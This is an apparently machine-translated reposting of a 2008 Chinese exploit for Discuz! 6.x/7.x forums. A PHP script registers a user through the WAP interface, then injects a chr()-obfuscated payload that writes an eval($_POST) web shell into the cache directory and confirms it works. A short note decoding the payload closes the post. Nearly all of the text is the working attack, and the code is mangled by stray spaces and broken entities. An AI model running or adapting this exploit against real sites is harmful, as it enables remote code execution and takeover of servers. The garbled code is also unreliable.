DZ! sodb-2 0 0 8-1 3 EXP published-vulnerability warning-the black bar safety net

2008-11-17T00:00:00
ID MYHACK58:62200821107
Type myhack58
Reporter 佚名
Modified 2008-11-17T00:00:00

Description

!/ usr/bin/php

<? php /* * Discuz! 6. x/7. x SODB-2 0 0 8-1 3 Exp * By www.80vul.com * Notes the value of the variable, add your own modifications / $host = ‘www.80vul.com’; // Server domain or IP $path = ‘/discuz/’; // Where the program path $key = 0; // The above variable is edited, make will the value here to 1

if (strpos($host, ‘://’) !== false || strpos($path, ‘/’) === false || $key !== 1) exit(”a professional point well,the first look inside the comments -,-\n”);

error_reporting(7); ini_set(’max_execution_time’, 0);

$key = time(); $cmd = ‘action=register&username=’.$ key.’& amp;password=’.$ key.’& amp;email=’.$ key.’@ 80vul. com&_DCACHE=1'; $resp = send();

preg_match(’/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/’, $resp, $sid);

if (!$ sid) exit(”Oh,is probably not turned on the WAP registration. -,- \n”);

$cmd = ’stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid=’.$ sid[1].’& amp;creditsformula=${${fputs(fopen(chr(4 6). chr(4 6). chr(4 7). chr(1 0 2). chr(1 1 1). chr(1 1 4). chr(1 1 7). chr(1 0 9). chr(1 0 0). chr(9 7). chr(1 1 6). chr(9 7). chr(4 7). chr(9 9). chr(9 7). chr(9 9). chr(1 0 4). chr(1 0 1). chr(4 7). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 6). chr(1 1 2). chr(1 0 4). chr(1 1 2),chr(1 1 9). chr(4 3)),chr(6 0). chr(6 3). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 0). chr(3 6). chr(9 5). chr(8 0). chr(7 9). chr(8 3). chr(8 4). chr(9 1). chr(9 9). chr(9 3). chr(4 1). chr(6 3). chr(6 2). chr(5 6). chr(4 8). chr(1 1 8). chr(1 1 7). chr(1 0 8))}}’; send();

$shell = ‘http://’.$ host.$ path.’forumdata/cache/eval.php’;

if (file_get_contents($shell) == ‘80vul’) exit(”well,go and see your WebShell.:\t$shell\n inside the code is:\t<? eval(\$_POST[c])?& gt;\n don't tell me you don't use -,-\n”); else exit(”well,is probably the site does not exist vulnerability,for one. -,- \n”);

function send() { global $host, $path, $url, $cmd;

$data = “POST “.$ path.”wap/index.php HTTP/1.1\r\n”; $data .= “Accept: /\r\n”; $data .= “Accept-Language: zh-cn\r\n”; $data .= “Referer: http://$host$path\r\n”; $data .= “Content-Type: application/x-www-form-urlencoded\r\n”; $data .= “User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n”; $data .= “Host: $host\r\n”; $data .= “Connection: Close\r\n”; $data .= “Content-Length: “. strlen($cmd).”\ r\n\r\n”; $data .= $cmd;

$fp = fsockopen($host, 8 0); fputs($fp, $data);

$resp = ”;

while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);

return $resp; }

?& gt;

Very strong a hole,I refers to the vulnerability of the formation of reason...the specific use of the efficiency of what not to say,of the wap to turn on:)

DZ! sodb-2 0 0 8-1 3 EXP small mind

fopen(../forumdata/cache/eval.php,w+,<? eval($_POST[c])?& gt;80vul) Wscript. echo chr(xx)followed by more time with&connection.

file_get_contents function reads the contents of the file. (Display it on the page..not the source code) To determine whether the 80vul,there is success now!